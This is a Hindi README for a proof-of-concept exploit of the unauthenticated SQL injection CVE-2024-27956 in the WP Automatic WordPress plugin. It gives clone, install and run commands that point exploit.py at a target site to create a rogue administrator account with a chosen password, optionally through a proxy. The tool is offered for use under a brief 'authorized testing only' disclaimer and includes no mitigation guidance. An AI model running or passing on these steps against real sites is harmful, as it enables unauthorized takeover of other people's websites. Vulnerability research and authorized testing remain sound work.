
CVE-2024-27956 - WP Automatic SQL Injection शोषण उपकरण
वर्डप्रेस साइटों को प्रभावित करने वाले WP Automatic प्लगइन में SQL इंजेक्शन भेद्यता (CVE-2024-27956) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण।
यह शोषण वर्डप्रेस के लिए WP Automatic प्लगइन (संस्करण < 3.9.2.0) में एक महत्वपूर्ण अप्रमाणिकृत SQL इंजेक्शन भेद्यता को लक्षित करता है। यह भेद्यता हमलावरों को प्रशासनिक उपयोगकर्ता बनाने और कमजोर वेबसाइटों पर पूर्ण नियंत्रण प्राप्त करने की अनुमति देती है।
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url Target WordPress URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username for the new admin account
-p PASSWORD, --password PASSWORD
Password for the new admin account
यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है। डेवलपर इस सॉफ़्टवेयर के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।